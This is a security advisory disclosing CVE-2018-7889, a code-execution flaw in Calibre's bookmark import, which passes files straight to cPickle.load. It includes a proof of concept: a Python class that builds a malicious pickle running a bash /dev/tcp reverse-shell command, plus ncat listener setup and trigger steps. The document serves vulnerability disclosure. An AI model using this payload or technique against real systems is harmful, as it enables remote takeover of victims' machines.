CVE-2018-7889: Code execution when importing bookmarks into an Ebook

A malicious pickle file can be used to trigger remote code execution in Calibre E-book Manager.

Affected Versions

This vulnerability affects all operating systems Calibre supports and is present in the latest version (3.18) of the application.


Calibre E-book Manager uses the Python pickle module for serialization in multiple places. This is a dangerous pattern because the deserialization of malicious pickle data can result in the execution of arbitrary Python code.

There is one specific functionality in Calibre where the use of pickle can be leveraged by an attacker to obtain code execution by social engineering a target.

Calibre allows users to export and import bookmark data from a specific ebook. src/calibre/gui2/viewer/ contains code that imports a previously exported file containing bookmark information. This file data is directly passed into cPickle.load.

206 files = choose_files(self, 'export-viewer-bookmarks', _('Import bookmarks'),
207     filters=[(_('Saved bookmarks'), ['pickle'])], all_files=False, select_only_single_file=True)
208        if not files:
209            return
210        filename = files[0]
212        imported = None
213        with open(filename, 'rb') as fileobj:
214            imported = cPickle.load(fileobj)

Proof of Concept

For the proof of concept, we will use a malicious pickle generated by the below

import cPickle
import os
import base64
import pickletools

class Exploit(object):
    def __reduce__(self):
        return (os.system, (("bash -i >& /dev/tcp/ 0>&1"),))

with open("exploit.pickle", "wb") as f:
    cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)

The exploit will make a reverse shell to a listener on, so we set that up using ncat.

$ ncat -nlvp 8000

Ncat: Version 7.60 ( )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 125E F683 5DA6 153A 6E26 E957 0C92 4706 2596 347C
Ncat: Listening on :::8000
Ncat: Listening on

We open an ebook and navigate to the “Bookmarks” icon on the left of the screen and click the “Show/hide bookmarks” menu item. We then click the “Import” button on the bookmarks pane and select the generated exploit.pickle file. This should trigger a reverse shell on our listener.


This issue was discovered by Ayrx.